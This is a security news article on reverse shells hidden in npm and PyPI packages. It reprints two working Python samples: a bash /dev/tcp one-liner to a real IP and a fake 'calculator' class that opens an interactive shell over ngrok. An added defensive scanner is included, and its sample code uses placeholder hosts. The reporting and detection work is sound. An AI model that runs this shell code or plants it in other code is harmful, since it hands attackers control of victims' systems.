Threat Actors Weaponize Shell Techniques to Maintain Persistence and Exfiltrate Data

Shells provide crucial command-line interfaces to operating systems. While legitimate for system administration tasks, when weaponized by threat actors, shells transform into dangerous avenues for unauthorized access, system control, and data theft across organizational networks.

The misuse of these tools has become increasingly sophisticated, with malicious actors embedding shell techniques within seemingly innocuous open-source packages.

Recent investigations reveal an alarming trend of sophisticated threat actors deploying shell techniques across npm, PyPI, Go, and Maven ecosystems.

These shells enable attackers to execute commands, browse file systems, and transfer sensitive data outside networks, often operating undetected for extended periods while maintaining persistent access to compromised infrastructure.

The versatility of these techniques makes them particularly dangerous in software supply chain attacks.

Notable state-sponsored groups, including Russia’s APT28, Vietnam’s APT32, and China’s HAFNIUM, have been documented using web shells for persistent access to compromised systems.

HAFNIUM particularly targets U.S. entities across multiple industry sectors to exfiltrate valuable trade secrets through compromised servers and web applications, highlighting the nation-state level interest in these attack methodologies.

Socket researchers identified multiple instances of malicious shell code hidden within legitimate-looking open-source packages.

Through large-scale scanning and real-time analysis, Socket’s threat research team uncovered how attackers obfuscate malicious payloads to evade detection while establishing persistent access channels to victim systems.

Their findings demonstrate the evolution of these threats and the increasing sophistication of concealment techniques.

The impact extends beyond immediate data theft, as compromised systems serve as persistent backdoors, enabling lateral movement and privilege escalation over time, potentially leading to catastrophic data breaches if left undetected.

Organizations unwittingly incorporating vulnerable or malicious dependencies face significant risks to their data integrity and operational security.

PyPI Shell Techniques

The most concerning discoveries in the PyPI ecosystem involve classic reverse shell implementations that provide attackers with complete system control.

One example shows code that launches an interactive bash shell and redirects all of its input and output to a remote connection:

import os
# bash -i: interactive shell; >& /dev/tcp/HOST/PORT sends stdout and stderr to the
# remote socket; 0>&1 attaches stdin to the same socket, giving a full reverse shell
os.system("bash -c 'bash -i >& /dev/tcp/103.252.137.168/7777 0>&1'")

This seemingly simple code imports the os module and executes a bash command that opens a TCP connection to a Vietnamese IP address on port 7777, giving the attacker full shell access to the compromised system.

The use of non-standard port 7777, which is typically left open for developer applications, makes this attack particularly effective at evading detection.

A more sophisticated example masquerades as a calculator function while establishing a reverse shell through an ngrok tunnel:

import socket,subprocess,os
class calculator:
    def add(x, y):
        # open a TCP connection to the ngrok endpoint (the original had a "socket. Socket" typo)
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(("2.tcp.ngrok.io",14048))
        # point stdin (0), stdout (1) and stderr (2) at the socket
        os.dup2(s.fileno(),0)
        os.dup2(s.fileno(),1)
        os.dup2(s.fileno(),2)
        # spawn an interactive sh inside a pseudo-terminal over that socket
        import pty
        pty.spawn("sh")
        # only reached once the shell exits; keeps the "calculator" cover story
        return x + y

This deceptive code returns the sum of inputs while creating a pseudo-terminal supporting advanced functionality including text editors and command history, making detection extraordinarily challenging for traditional security tools.

The use of ngrok as a tunneling service makes the connection more difficult to block, while the pty module creates a pseudo-terminal that enables complex terminal operations.
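As an added example (not code from the article or from Socket's tooling), a small AST-based scanner that flags the three building blocks seen in the two PyPI samples above: shell commands carrying /dev/tcp or bash -i, file descriptors duplicated onto a socket, and pty.spawn, plus an outbound connect to a literal host/port. The indicator list, function names and sample inputs are my own assumptions; the samples use a TEST-NET address and an example domain rather than real infrastructure.

```python
import ast

# Heuristic markers for the one-liner pattern (assumption: my own list, not a vendor signature)
SHELL_CMD_MARKERS = ("/dev/tcp/", "bash -i")
SHELL_EXEC_FUNCS = ("os.system", "os.popen", "subprocess.call", "subprocess.Popen", "subprocess.run")

def _dotted(node):
    """Return a dotted name such as 'os.dup2' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def scan_source(src):
    """Parse Python source and return [(line, finding)] for reverse-shell building blocks."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted(node.func)
        literals = [a.value for a in node.args
                    if isinstance(a, ast.Constant) and isinstance(a.value, str)]
        if name in SHELL_EXEC_FUNCS:
            if any(m in s for s in literals for m in SHELL_CMD_MARKERS):
                findings.append((node.lineno, "shell command with reverse-shell marker"))
        elif name == "os.dup2" and node.args and isinstance(node.args[0], ast.Call):
            # stdin/stdout/stderr being pointed at something's fileno(), typically a socket
            inner = _dotted(node.args[0].func) or ""
            if inner.endswith(".fileno"):
                findings.append((node.lineno, "fd duplicated onto a socket (I/O redirection)"))
        elif name == "pty.spawn":
            findings.append((node.lineno, "interactive pseudo-terminal spawned"))
        elif name and name.endswith(".connect") and node.args and isinstance(node.args[0], ast.Tuple):
            findings.append((node.lineno, "outbound connect to literal host/port"))
    return findings

# Constructed samples mirroring the two patterns in the article (placeholder host/port)
SAMPLE_ONE_LINER = '''import os
os.system("bash -c 'bash -i >& /dev/tcp/203.0.113.5/7777 0>&1'")
'''
SAMPLE_CALCULATOR = '''import socket,subprocess,os
class calculator:
    def add(x, y):
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(("attacker.example",14048))
        os.dup2(s.fileno(),0)
        os.dup2(s.fileno(),1)
        os.dup2(s.fileno(),2)
        import pty
        pty.spawn("sh")
        return x + y
'''
BENIGN = "import os\nprint(os.path.join('a', 'b'))\n"
```

Run it over a package's .py files before installation; a hit on any of these findings is worth a manual look even when the surrounding code looks like an ordinary utility.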

Socket experts recommend strengthening defenses by incorporating supply chain security tools, enforcing strong policies for third-party dependencies, and conducting regular reviews to minimize these increasingly sophisticated shell-based attack risks.


The post Threat Actors Weaponize Shell Techniques to Maintain Persistence and Exfiltrate Data appeared first on Cyber Security News.
